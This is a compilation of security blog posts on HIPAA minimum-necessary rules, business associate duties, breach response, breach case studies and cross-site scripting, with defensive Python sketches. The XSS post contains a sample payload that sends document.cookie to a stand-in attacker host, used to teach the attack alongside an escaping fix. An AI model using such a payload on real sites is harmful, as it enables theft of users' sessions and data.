5 Things You Should Know About Minimum Necessary PHI

“All this is on a strictly need-to-know basis. As in, nobody else needs to know.” –Kami Garcia.

By: Tod Ferran
There aren’t many times in life when you can get away with doing the bare minimum. Handling PHI is one of them. Here are 5 things you should know about the minimum necessary HIPAA requirement.


1. PHI should only be shared on a need-to-know basis.

In military operations, a need-to-know restriction limits extremely sensitive information to the people who must know it to get the job done. Although thousands of personnel are involved in planning battles, only a small number (usually high-ranking officers) have the security clearance to know everything about the operation. The rest are informed only of the parts of the plan necessary to complete their specific tasks.

Protected health information (PHI) is kind of like a sensitive battle plan. Instead of the need-to-know restriction, the HHS calls this control the minimum necessary requirement. The HHS says this requirement is “based on sound current practice that protected health information should not be used or disclosed when it is not necessary to satisfy a particular purpose or carry out a function.”

Only those who need to see PHI to do their jobs should get to see it; unless someone has a specific need for the information, their access must be restricted. For example, a receptionist (or anyone else who doesn’t provide direct patient care) probably doesn’t need to see a patient’s X-rays to do his or her job.

By limiting PHI access to the smallest number of people possible, the likelihood of a breach or impermissible disclosure (and the resulting HIPAA violation) decreases significantly.

2. Limit user access by creating individual user accounts.

The HHS states, “if a hospital employee is allowed to have routine, unimpeded access to patients’ medical records, where such access is not necessary for the hospital employee to do his job, the hospital is not applying the minimum necessary standard.”

It’s a covered entity’s responsibility to limit who within the organization has access to each specific part or component of PHI. The easiest way to take charge of the data is by creating individual user accounts.

SEE ALSO: Everyone Is Not Created Equal In Healthcare

In the ideal scenario, each user account in a network, EHR, or computer system would be given certain privileges based on the job title or role of the user. For example, an account with “doctor” privileges would have access to all PHI in the patient database, because doctors need it to do their jobs. An account with “IT admin” privileges would have restricted access to PHI, because IT admins aren’t involved in patient care.
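
Here’s what that might look like in practice. This is a minimal Python sketch with made-up role names and record fields, not any particular EHR’s data model:

# Minimal sketch of role-based access to PHI. The role names, record fields,
# and permission sets here are made up for illustration.
PHI_PERMISSIONS = {
    "doctor":    {"demographics", "history", "imaging", "medications"},
    "nurse":     {"demographics", "history", "medications"},
    "reception": {"demographics"},   # scheduling info only, no clinical data
    "it_admin":  set(),              # no routine access to patient data
}

def allowed_fields(role, record):
    """Return only the parts of a patient record this role may see."""
    permitted = PHI_PERMISSIONS.get(role, set())
    return {field: value for field, value in record.items() if field in permitted}

record = {
    "demographics": {"name": "Jane Doe", "dob": "1980-01-01"},
    "history": ["flu shot 2014"],
    "imaging": ["left knee X-ray"],
    "medications": ["ibuprofen"],
}

print(allowed_fields("reception", record))  # demographics only
print(allowed_fields("it_admin", record))   # empty dict -- minimum necessary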

3. Covered entities pass way too much data to their business associates.

The minimum necessary requirement doesn’t just apply within your organization. It also applies to information shared externally with third parties and subcontractors. Entities are required to limit how much PHI they disclose based on the job responsibilities and the nature of the third party’s business.

Say a patient needed a prosthetic leg. If the hospital sent the entire patient record to the prosthetic manufacturer (its business associate), it would be violating the minimum necessary requirement. The manufacturer doesn’t need to know about the patient’s flu shot from 10 years ago; all it needs are the specifications for the prosthetic so it can correctly do its job.
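
As an illustration (with field names I made up, since the real record format depends on your systems), the disclosure logic is just a whitelist of what the business associate actually needs:

# Sketch of building a minimum necessary disclosure for a business associate.
# The field names are invented; the point is to whitelist what the recipient
# actually needs rather than shipping the whole record.
FULL_RECORD = {
    "patient_id": "12345",
    "leg_measurements": {"length_cm": 48.0, "circumference_cm": 38.5},
    "amputation_level": "below knee",
    "immunization_history": ["flu shot, 10 years ago"],  # irrelevant to the prosthetist
    "allergies": ["penicillin"],                          # also irrelevant here
}

PROSTHETICS_VENDOR_NEEDS = {"patient_id", "leg_measurements", "amputation_level"}

def disclosure_for(needed_fields, record):
    """Send only the fields the business associate needs to do its job."""
    return {field: value for field, value in record.items() if field in needed_fields}

print(disclosure_for(PROSTHETICS_VENDOR_NEEDS, FULL_RECORD))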

SEE ALSO: You Can't Hide Behind a Business Associate Agreement

Passing too much PHI to a business associate could get your organization slapped with a fine. Be careful about how much data you are sending and receiving.


4. Don’t worry about passing too much data when talking to other doctors.

If you’re communicating doctor to doctor, don’t worry; you get a pass. The minimum necessary standard doesn’t apply to disclosures to (or requests by) a healthcare provider for treatment purposes.

Because many ailments, treatments, and medications are related, most situations require the entire medical history to be sent from doctor to doctor. Just remember to use your best judgment.

5. Both entities and business associates are responsible for the minimum necessary requirement.

I’ve witnessed many business associates tell their covered entity partners that the business associate gets to decide how much data it receives, and that it’s the covered entity’s responsibility to just ship it all over. Au contraire, Mr. Business Associate!

Each party (covered entity and business associate) has a minimum necessary responsibility under HIPAA. That means either party can be fined by the HHS for misapplying (or completely disregarding) the minimum necessary rule. If a business associate demands more data than is necessary from its covered entities, it could be fined for ignoring the rules.

Let me clear up any confusion about your responsibility concerning minimum necessary data:
  • Covered entity responsibility: determine what data is the minimum necessary to send, and then only send that data and nothing else.
  • Business associate responsibility: only accept and use the minimum necessary data.
Just remember: Less is more when it comes to sharing PHI.

Did this post help you? If so, please share!

Tod Ferran (CISSP, QSA) is a Security Analyst for SecurityMetrics with 25 years of IT security experience. He provides security consulting, risk analysis assistance, risk management plan support, and performs HIPAA and PCI compliance audits. Check out his other blog posts.
Cross-Site Scripting, Explained

One of the most common website attacks that most businesses have never heard of.

By: Brand Barney
Cross-site scripting (also known as XSS) allows bad guys to embed malicious code into a legitimate (but vulnerable) website to ultimately gather user data like credit cards or passwords.



Want to see more vids like this? Subscribe on YouTube for more security tips.

How does cross-site scripting work? Here’s an example of one type of XSS.

  • The hacker finds a legitimate webpage with an input field. Input fields could range from a first name field to a credit card field. 
  • The hacker checks if the webpage is vulnerable to cross-site scripting. For this type of attack to work, the web application must use the data the user enters and echo it back to the user. For example, if you sign in with your username (say, example123) and the webpage says something like, “Welcome example123!”, that webpage is echoing your data back to you (see the sketch after this list).
  • The hacker embeds malicious script. Based on the JavaScript they enter into input fields (a comments field, for example), hackers can capture the keystrokes of the user, steal usernames or passwords entered into the fields, or even copy the entire webpage and redirect users to a fake webpage.
  • The hacker sits back and waits. When a user visits the web page (usually through a bad URL), the JavaScript executes in his or her browser (stealing all manner of sensitive data). Users usually have no idea this is happening.
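
To see how little it takes, here’s a minimal sketch of that echo-back pattern in Python. The attacker URL and the page-building function are hypothetical; the point is that whatever lands in the input field lands, unmodified, in the page the browser will render.

# Sketch of the echo-back pattern reflected XSS abuses. The attacker URL
# below is made up; nothing here contacts a real server.
def render_welcome(username):
    # User input is dropped straight into the HTML response.
    return f"<p>Welcome {username}!</p>"

payload = '<script>new Image().src = "https://attacker.example/steal?c=" + document.cookie;</script>'
print(render_welcome(payload))
# The <script> tag lands unmodified in the page, so the victim's browser would execute it.
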
SEE ALSO: The Case of the Evil JavaScript


Is my website vulnerable to cross-site scripting?

Possibly. I estimate that a third of all websites are susceptible to XSS.
XSS is a huge flaw in many websites if left untested and unaddressed.

How to stop cross-site scripting on your website

  • Run external vulnerability scans. Vulnerability scans help locate coding errors where XSS vulnerabilities may occur.
  • Talk to your web developer and make sure your site is properly coded with security in mind (see the sketch below).
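
“Properly coded” largely comes down to treating user input as text, not markup. Here’s a minimal Python sketch of the idea using the standard library’s html.escape; most modern templating engines (Jinja2, for example) do this automatically, so treat this as an illustration of the principle rather than a drop-in fix:

import html

def render_welcome(username):
    # html.escape turns <, >, &, and quotes into HTML entities, so any
    # injected markup is displayed as text instead of being executed.
    return f"<p>Welcome {html.escape(username)}!</p>"

print(render_welcome('<script>alert(1)</script>'))
# -> <p>Welcome &lt;script&gt;alert(1)&lt;/script&gt;!</p>
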
Ask your business security question in the comments!


Brand Barney (CISSP) is a Security Analyst at SecurityMetrics and has over 10 years of compliance, data security, and database management experience. Follow him on Twitter and check out his other blog posts.
You Can’t Hide Behind a Business Associate Agreement

What it really means to maintain BA HIPAA compliance

By: Tod Ferran
This article was also featured in HITECH Answers.

During the last few months of auditing various HIPAA environments, I’ve seen three distinct groups of covered entities that have responded to new HIPAA Omnibus requirements regarding business associates.
  • Group #1: Most common. They’ve chosen to completely ignore the new requirement to update all business associate agreements (BAA). Perhaps they are lazy, busy, or worried that asking for a new signature might negatively affect the relationship or open the door for the BA to negotiate new terms.
  • Group #2: Up and coming. They slowly work to update and encourage signing of all agreements, but believe that’s all it takes to become compliant.
  • Group #3: Practically nonexistent. They diligently work to ensure business associates are truly HIPAA compliant and securely handling patient data before accepting any new/updated agreements and before transmitting any electronic protected health information (ePHI) to the BA.
Want to take a guess which group you should be in?

Covered entities don’t have the option to hide behind a BAA if a Health and Human Services (HHS) auditor comes knocking. This tactic may have worked before September 2013, but the HHS specifically stated in new HIPAA documentation that covered entities are required to take dual responsibility for patient data protection, and signing a new agreement just isn’t enough anymore. The HHS calls this new business associate responsibility ‘obtaining satisfactory assurances.’

SEE ALSO: What to Expect With Upcoming HHS Audits

Though government documentation does little to explain the phrase, ‘satisfactory assurances’ essentially means covered entities must personally take measures to check BA patient data handling processes and review BA security measures. To meet this requirement, some covered entities require proof of a completed risk analysis or personally request the implementation of a standard risk management plan. Others track all business associates with a compliance-monitoring tool.

It’s common sense

The logic behind the new rule is quite sound when you think about it. The new rule prevents business associates from signing contracts without actually implementing HIPAA practices.
Would you give a teenager who failed the driving test the keys to your car if they promised they’d be careful? The HHS wouldn’t.
You have been assigned the part of the responsible parent, and if you willfully neglect that responsibility, the HHS may come after you to the tune of $50,000 minimum per violation.

BA best practices

Don’t get me wrong, I’m not trying to downplay the importance of business associate agreements. After all, they are still required under the HIPAA rules. Just remember that patient data is so important that you may need to consider dropping business associates that choose to ignore compliance best practices. With recent class-action lawsuits seeking $1,000 per compromised individual, it’s worth it to be choosy.

Here’s the moral of the story. The new HIPAA Omnibus rule isn’t just about signing a new BAA. Every covered entity with business associates (virtually all of you) is required to obtain assurances that their business associates treat patient data the way the HHS wants them to, and the way you want them to. Whether you choose to personally audit each BA, or require documented data security procedures, take the initiative to secure the future of your organization and safety of patient data.




Tod Ferran (CISSP, QSA) is a Security Analyst for SecurityMetrics with 25 years of IT security experience. He provides security consulting, risk analysis assistance, risk management plan support, and performs HIPAA and PCI compliance audits. Check out his other blog posts.
What To Do If Your Business Is Hacked

If your organization is compromised, you’re not powerless.

By: Brand Barney
Small businesses are the target of many compromises. In fact, according to Symantec, cyber attacks on small businesses rose 300% in 2012 from the previous year.

Many business owners call us in a panic after learning their retail location or website has been hacked. Terrified, these merchants literally have no idea what to do. 

But you CAN do something after a breach! Even though you’re not a security expert, there are a few to-dos that might actually help reduce any compromise penalties you may encounter. I personally know of a few instances in which the card brands (Visa, MasterCard, etc.) reduced compromise penalties because a hacked merchant acted proactively immediately following the breach.

In the video below, I give some guidance on what you personally can do if you suspect a breach.


Want to see more vids like this? Subscribe on YouTube for more security tips.

Recap: what to do when you are hacked (or suspect you’ve been hacked)

  • Contain the breach to minimize its impact
    • Stop use of all compromised systems
    • Revert to telephone dial-out terminals
    • Pull your online shopping cart offline
    • Disconnect from the Internet (if you’re connected via modem, unplug the modem cable; if you’re connected via Ethernet, unplug the Ethernet cable)
    • Change all passwords
  • Contact appropriate parties
    • IT staff, developer, and/or hosting provider
    • Merchant processor
    • Local authorities
    • Lawyer
    • Request a forensic investigator
  • Take advantage of your compromise reimbursement program

Have a business security question? Ask me below.

Brand Barney (CISSP) is a Security Analyst at SecurityMetrics and has over 10 years of compliance, data security, and database management experience. Follow him on Twitter and check out his other blog posts.
Security Blunder Case Studies

These three businesses had no idea it was coming.

By: David Ellis
This article was also featured in Multi-Unit Franchisee: “Prevent Hacking Horror Stories”

We hear hacking horror stories every day. Businesses around the world call us in a panic, needing to decipher what went wrong with their security. I thought I’d share some details from actual incidents. Unfortunately, these miscues are common in many small businesses. My hope is, after reading about these security failures, you will see actions you can take to enhance your own security.

#1: Pass the pepperoni and passwords, please

This first incident involved several small pizza chains that utilized the same restaurant management software and point of sale (POS) hardware/software. Sadly, hundreds of those restaurants were hacked.

Once each restaurant’s POS system was configured, the local restaurant owners did not change the default POS password set by the payment application vendor. A hacker easily deduced the password, infiltrated each POS system and installed a memory scraper.

SEE ALSO: Vendor-Supplied Defaults Are a Serious Threat

A memory scraper is malware (malicious software) designed to ‘scrape’ sensitive information from system memory (RAM). This memory scraper was specifically designed to scrape customer credit card information from each restaurant’s POS system. Thousands of pizza-lovers’ credit cards were stolen.

Moral: Don’t leave your passwords in their default state

It’s typical for POS terminals and other software/hardware solutions to begin their lifecycle with default passwords. Default passwords make it easy for IT vendors to install a system without learning a new password each time. The problem is that default passwords are often simple to guess, and many are even published on the Internet.

Passwords should be changed every 90 days and contain at least 10 characters, including upper AND lower case letters, AND numbers, AND special characters. Passwords that fall short of these criteria can usually be broken using a password-cracking tool.
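
If you want to sanity-check passwords against those criteria yourself, a minimal Python sketch might look like this (the 90-day rotation is a separate, time-based control your directory service or payment application would enforce):

import re

def meets_policy(password):
    """Check the criteria above: at least 10 characters, with upper case,
    lower case, numbers, and special characters."""
    return bool(
        len(password) >= 10
        and re.search(r"[A-Z]", password)
        and re.search(r"[a-z]", password)
        and re.search(r"\d", password)
        and re.search(r"[^A-Za-z0-9]", password)
    )

print(meets_policy("pizza123"))        # False -- too short, no upper case or special character
print(meets_policy("Deep-Dish!2024"))  # True
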
SEE ALSO: HIPAA Compliant Passwords

#2: A picture is worth a thousand hacks

A popular website hosting service gave customers the ability to log in to their corporate server to upload website images through the file transfer protocol (FTP) feature. An attacker hacked the FTP upload and uploaded malicious code onto the host’s servers.

Because the web-hosting service had access to each of its customers’ websites, every client website was infected with malware designed to capture credit card information from checkout pages.

Moral: Don’t invite customers to waltz into your corporate server

Why was the hacker able to access credit card information in multiple accounts through a picture uploader? The main problems in this scenario were a lack of network segmentation and a lack of understanding that FTP is inherently insecure. The web-hosting service shouldn’t have utilized FTP, and it should have segmented its customers’ accounts from one another.

Segmentation is the act of using firewall technology to compartmentalize network areas that contain sensitive information (like customer credit cards) from those that don’t.
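
On the FTP half of the problem, the fix is to move uploads to an encrypted channel such as SFTP. Here’s a minimal sketch using the third-party paramiko library; the host name, account, key path, and file paths are all placeholders:

# Sketch: upload a website image over SFTP (which runs over SSH) instead of
# plain FTP, which sends credentials and data in the clear. Host, account,
# key path, and file paths below are placeholders.
import paramiko

def upload_image(host, username, key_path, local_file, remote_file):
    client = paramiko.SSHClient()
    client.load_system_host_keys()  # verify the server's host key
    client.connect(host, username=username, key_filename=key_path)
    try:
        sftp = client.open_sftp()
        sftp.put(local_file, remote_file)  # encrypted transfer
        sftp.close()
    finally:
        client.close()

# Example (placeholders):
# upload_image("upload.example.com", "site123", "/home/site123/.ssh/id_ed25519",
#              "logo.png", "/var/www/site123/images/logo.png")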


#3: Compromise is just a password away

An unfortunate franchisee with hundreds of high-dollar restaurants hired an IT company to configure its remote access systems across multiple locations.

Remote access is the ability to access a computer or server from a remote location. It’s often used in mid-size to large organizations by employees who need access to shared files and company networks, or by business owners logging in from home to view the day’s receipts. Popular remote access applications include pcAnywhere, VNC, LogMeIn, and TeamViewer.

SEE ALSO: Securing Remote Access in Healthcare Environments

The IT company configured the remote access application with a single username and password shared across every restaurant location. Once a hacker discovered the username and password for one location, he was able to download malware onto the POS systems of all of the restaurants. This resulted in the theft of thousands of customer credit cards.

Moral: Remote access is only as secure as its authentication

This hack could easily have been prevented if the franchisee had complied with the Payment Card Industry Data Security Standard (PCI DSS), which mandates that all remote access into the cardholder environment requires two-factor authentication. This means in addition to entering a username and complex password, you must also complete a second secure login step, such as physically calling an onsite manager to be granted a remote session, entering a one-time authentication code sent to a specific cell phone, or matching unique client-side certificate files.
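
The one-time code option, for example, can be as simple as a time-based one-time password (TOTP). Here’s a minimal sketch using the third-party pyotp package; in a real deployment the secret is enrolled once on the user’s phone, not generated at login time:

# Sketch of a time-based one-time code (TOTP) as the second factor for a
# remote session. In practice the secret is enrolled on the user's
# authenticator app ahead of time, not generated here.
import pyotp

secret = pyotp.random_base32()   # shared once with the user's authenticator app
totp = pyotp.TOTP(secret)

password_ok = True               # first factor: username + complex password (checked elsewhere)
code_from_user = totp.now()      # in real life, typed in by the person logging in

if password_ok and totp.verify(code_from_user):
    print("Second factor verified -- remote session granted.")
else:
    print("Authentication failed.")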

Summary

In my experience, these scenarios highlight common problems in small business credit card security. I encourage you to check your system to see if one or more of these security vulnerabilities exist. Look for default or non-complex passwords, install security patches and updates, configure your payment application securely, segment your credit card processing network from all other networks, and ensure your remote access requires two-factor authentication.

If you liked this post, please share!

David Ellis (GCIH, QSA, PFI, CISSP) is Director of Forensic Investigations at SecurityMetrics with over 25 years of law enforcement and investigative experience. Check out his other blog posts.